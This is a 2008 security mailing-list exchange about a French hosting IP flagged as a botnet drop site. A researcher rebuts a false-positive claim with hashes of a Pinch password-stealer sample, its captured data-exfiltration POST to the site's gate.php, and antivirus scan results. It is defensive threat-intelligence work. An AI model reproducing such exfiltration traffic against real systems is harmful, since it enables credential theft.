[nsp-sec] 212.43.241.106 in the daily reports
Jose Nazario
jose at arbor.net
Mon Feb 25 07:26:46 EST 2008
On Mon, 25 Feb 2008, David Freedman wrote:
> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
> the URL http://www.winfleet.fr/fr/gate.php,
> I've been told the following by our systems dept:
> "The ip 212.43.241.106 is the virtual ip of our mutualized hosting. The
> script gate.php sends a mail directly or from a file whith information
> of customers' gps location of trucks.
> This script seems to be very normal. "
> Can we get this removed from the reports as a false positive?
from this perspective - outside looking in - i'm pretty sure it's not a
false positive based on the data i have available to me. i have a sample
that POSTs to that very URL, and it's a Pinch POST.
MD5: 9efb1eb0eae22a713c91c7060bb46da3
SHA1: 9b391b3a76a2f4e4e3f250ad4cd4d77e3436fe26
File type: application/x-ms-dos-executable
File size: 53248 bytes
POST /fr/gate.php
HTTP/1.0 Host: www.winfleet.fr
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 13414
a=asd at timeparty.org&b=my_report&d=report.bin&c=UDNNTAAAAACiJAAAEQ....
here's the vtotal on it:
[ file data ]
* name: 112226
* size: 53248
* md5.: 9efb1eb0eae22a713c91c7060bb46da3
* sha1: 9b391b3a76a2f4e4e3f250ad4cd4d77e3436fe26
* peid..: -
[ scan result ]
AhnLab-V3 2008.2.22.0/20080222 found [Dropper/Agent.53248.N]
AntiVir 7.6.0.67/20080225 found [TR/PSW.LdPinch.TAW.446]
Authentium 4.93.8/20080224 found nothing
Avast 4.7.1098.0/20080224 found nothing
AVG 7.5.0.516/20080225 found nothing
BitDefender 7.2/20080225 found [Packer.Malware.Crypter.C]
CAT-QuickHeal 9.50/20080222 found nothing
ClamAV 0.92.1/20080225 found [Trojan.Dropper-3953]
DrWeb 4.44.0.09170/20080225 found [Trojan.PWS.LDPinch.2534]
eSafe 7.0.15.0/20080221 found [Suspicious File]
eTrust-Vet 31.3.5562/20080225 found nothing
Ewido 4.0/20080225 found nothing
F-Prot 4.4.2.54/20080224 found [W32/Heuristic-162!Eldorado]
F-Secure 6.70.13260.0/20080225 found nothing
FileAdvisor 1/20080225 found nothing
Fortinet 3.14.0.0/20080225 found nothing
Ikarus T3.1.1.20/20080225 found [Trojan-Downloader.Delf.OAQ]
Kaspersky 7.0.0.125/20080225 found [Trojan-Dropper.Win32.Agent.dqv]
McAfee 5236/20080222 found nothing
Microsoft 1.3204/20080225 found [Trojan:Win32/Meredrop]
NOD32v2 2899/20080225 found [a variant of Win32/TrojanDropper.Delf.NFQ]
Norman 5.80.02/20080225 found [W32/Agent.DZWU]
Panda 9.0.0.4/20080225 found [Suspicious file]
Prevx1 V2/20080225 found nothing
Rising 20.33.02.00/20080225 found nothing
Sophos 4.26.0/20080225 found [Mal/Generic-A]
Sunbelt 3.0.893.0/20080223 found [Trojan-PWS.LDPinch.TAW]
Symantec 10/20080225 found nothing
TheHacker 6.2.9.228/20080223 found nothing
VBA32 3.12.6.1/20080221 found [Trojan-Dropper.Win32.Agent.dqv]
VirusBuster 4.3.26:9/20080224 found nothing
Webwasher-Gateway 6.6.2/20080225 found [Trojan.PSW.LdPinch.TAW.446]
[ notes ]
packers: embedded, RCryptor
i can send you everything i have on it if you need it.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
More information about the nsp-security
mailing list